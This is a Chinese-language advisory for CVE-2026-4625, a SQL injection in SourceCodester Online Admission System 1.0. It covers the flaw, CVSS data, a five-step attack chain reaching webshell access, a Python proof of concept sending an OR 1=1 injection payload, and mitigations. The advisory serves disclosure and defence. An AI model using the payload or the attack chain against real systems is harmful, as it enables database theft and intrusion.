CVE-2026-4625 SourceCodester SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-4625

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Online Admission System

漏洞概述

SourceCodester Online Admission System 1.0版本被发现存在SQL注入漏洞。该漏洞位于/programmes.php文件中，由于程序未对用户输入的'program'参数进行严格的过滤和验证，导致攻击者可以远程构造恶意SQL语句并执行。目前该漏洞的利用细节已被公开，攻击者无需用户交互即可发起攻击，成功利用可能导致数据库敏感信息泄露、数据篡改或系统权限提升，安全风险较高。

技术细节

该漏洞的技术原理在于典型的SQL注入缺陷。在SourceCodester Online Admission System 1.0的/programmes.php接口处理逻辑中，后端代码直接获取HTTP请求中的'program'参数，并将其动态拼接到SQL查询语句中，未采用参数化查询或预编译技术。由于缺乏有效的输入清洗机制，攻击者可以通过在参数值中插入SQL控制字符（如单引号、注释符）和布尔逻辑语句，改变原始SQL语句的语义。根据CVSS向量分析，该漏洞攻击复杂度低（AC:L），无需特权（PR:N）且无需用户交互（UI:N），攻击者可通过网络（AV:N）发起攻击。成功的利用将允许攻击者在数据库上下文中执行任意命令，从而窃取管理员凭证、学生信息等敏感数据，或破坏数据库完整性。

攻击链分析

STEP 1

侦察

攻击者使用扫描工具或手动访问目标，确认目标运行的是SourceCodester Online Admission System 1.0，并定位到/programmes.php接口。

STEP 2

漏洞探测

攻击者向/programmes.php发送包含特定SQL注入测试字符（如单引号）的请求，观察服务器响应是否出现数据库错误或响应时间的异常变化。

STEP 3

构造攻击载荷

确认漏洞存在后，攻击者根据数据库类型（如MySQL）构造高级SQL注入Payload，例如UNION SELECT查询以提取表结构和数据。

STEP 4

执行利用

将构造好的Payload通过'program'参数发送给服务器，数据库执行恶意SQL语句，返回敏感数据（如用户名、密码哈希）。

STEP 5

后续渗透

利用获取的数据库凭据或进一步利用写入权限，尝试获取Webshell或提升服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target.com/programmes.php"

# Vulnerable parameter: program
# Payload: Testing for boolean-based blind SQL injection
# Example: ' OR 1=1-- -
payload = "1' OR 1=1-- -"

params = {
    "program": payload
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the response content for differences indicating injection.")
        # Analyze response to confirm vulnerability
        if "expected_content" in response.text:
            print("[!] Vulnerability confirmed!")
    else:
        print("[-] Target returned status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Online Admission System 1.0

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）以拦截针对/programmes.php的SQL注入攻击流量。在未修复前，可暂时通过URL重写规则禁用该页面的访问，或对'program'参数实施白名单验证（仅允许数字）。同时，应全面检查数据库日志，排查是否已遭受数据窃取。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4625
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4625
3 Details https://www.cvedetails.com/cve/CVE-2026-4625/
4 VulDB https://vuldb.com/cve/CVE-2026-4625
5 Link https://github.com/WHOAMI-xiaoyu/CVE/blob/main/CVE_7.md
6 Link https://vuldb.com/?ctiid.352493
7 Link https://vuldb.com/?id.352493
8 Link https://vuldb.com/?submit.775788
9 Link https://www.sourcecodester.com/